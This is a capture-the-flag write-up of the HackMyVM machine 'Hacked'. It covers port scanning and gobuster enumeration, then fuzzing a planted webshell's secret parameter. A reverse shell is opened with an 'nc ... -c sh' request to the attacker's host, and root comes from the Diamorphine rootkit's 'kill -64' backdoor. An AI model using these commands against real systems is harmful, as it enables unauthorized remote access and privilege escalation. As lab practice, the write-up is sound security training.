NOTES ABOUT Hacked

[ 2022-12-06 ] [ HackMyVM / Hacked ]

Status: Rooted
Skills: Port Scanning, Fuzzing, Rootkit
Tools: nmap, gobuster

PORT SCANNING

$ nmap -sCSV -p- 10.0.2.49

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:75:44:05:5f:f8:4f:ac:a1:33:fa:84:03:db:6f:94 (RSA)
|   256 5a:b6:c6:9d:a9:15:42:74:4c:7a:f9:dd:67:ae:75:0e (ECDSA)
|_  256 05:97:3c:74:bd:cf:8d:80:87:05:26:64:7f:d9:3d:c3 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn\'t have a title (text/html).
|_http-server-header: nginx/1.14.2

GETTING IN

$ curl http://10.0.2.49/
HACKED BY h4x0r

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.49
/index.html           (Status: 200) [Size: 16]
/robots.txt           (Status: 200) [Size: 16]

$ curl http://10.0.2.49/robots.txt
/secretnote.txt

$ curl http://10.0.2.49/secretnote.txt 
[X] Enumeration
[X] Exploitation
[X] Privesc
[X] Maintaining Access.
 |__> Webshell installed.
 |__> Root shell created.

-h4x0r

gobuster -q dir -w /usr/share/seclists/Web-Shells/backdoor_list.txt -u http://10.0.2.49 
/si***********or.php  (Status: 302) [Size: 62] [--> /]
/si***********or.php  (Status: 302) [Size: 62] [--> /]

$ curl http://10.0.2.49/simple-backdoor.php
I modified this webshell to only execute my secret parameter.

$ gobuster -q fuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.49/simple-backdoor.php?FUZZ=id --exclude-length 62 
Found: [Status=302] [Length=115] http://10.0.2.49/simple-backdoor.php?******=id

$ curl http://10.0.2.49/simple-backdoor.php?****=id
I modified this webshell to only execute my secret parameter.
uid=33(www-data) gid=33(www-data) groups=33(www-data) 

$ curl http://10.0.2.49/simple-backdoor.php?******=nc%2010.0.2.15%20443%20-c%20sh

ELEVATING PRIVILEGES

https://github.com/m0nad/Diamorphine

www-data@hacked:~$ lsmod
Module                  Size  Used by
diamorphine            16384  0		#rootkit
[...]

# Sending a signal 64(to any pid) makes the given user become root;
www-data@hacked:~$ kill -64 1337
www-data@hacked:~$ id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

www-data@hacked:/home/h4x0r$ cat user.txt 
*********************

www-data@hacked:/root$ cat root.txt 
*********************

www-data@hacked:/$ init 0

--- Loaded 450 times ---